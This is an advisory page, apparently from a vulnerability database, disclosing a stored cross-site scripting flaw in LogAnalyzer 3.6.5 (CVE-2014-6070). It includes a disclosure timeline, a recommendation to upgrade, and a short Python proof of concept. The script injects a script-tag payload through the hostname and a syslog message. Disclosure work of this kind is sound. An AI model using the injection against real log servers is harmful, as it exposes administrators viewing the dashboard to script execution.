LogAnalyzer 3.6.5 Cross Site Scripting

2014.09.03
Credit: Dolev Farhi
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Author: Dolev Farhi @dolevff Application: LogAnalyzer Date: 8.2.2014 Tested on: Red Hat Enterprise Linux 6.4 Relevant CVEs: CVE-2014-6070 1. About the application ------------------------ LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing, analysis of realtime network events and reporting services. 2. Vulnerabilities Descriptions: ----------------------------- It was found that an XSS injection is possible on a syslog server running LogAnalyzer version 3.6.5. by changing the hostname of any entity logging to syslog server with LogAnalyzer to <script>alert("xss")</script>, and sending an arbitrary syslog message, a client-side script injection execution is possible. 3. Life cycle -------------------- 8.2.2014 - Vulnerability identified 9.2.2014 - CVE Requested 9.2.2014 - CVE Assigned 9.2.2014 - Vendor releases a fix in a minor release version 3.6.6. 4. proof of concept ----------------------- a proof of concept video and a working exploit can be found here: http://research.openflare.org/poc/OF-2014-16/ #!/usr/bin/python # Exploit title = LogAnalyzer 3.5.6 Stored XSS injection # Date: Sept 2014 # Exploit Author: Dolev Farhi dolevf at yahoo dot com # Vendor homepage: loganalyzer.adiscon.com # Version: Stable 3.6.5 # Tested on Red Hat Enterprise Linux 6.4 # CVE: CVE-2014-6070 import os import syslog hostname = os.uname()[1] payload = "\"<script>alert('XSS');</script>\"" print("+ Setting temporary hostname to " + payload + "...") os.system("hostname " + payload) print("+ Injecting the syslog message...") syslog.syslog("syslog xss injection") print("+ Check LogAnalyzer dashboard...") raw_input("+ Press [enter] to restore hostname...") os.system("hostname " + "\"" + hostname + "\"") print("+ Hostname restored to " + hostname) 5. Recommendation -------------------------- upgrade to LogAnalyzer 3.6.6


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top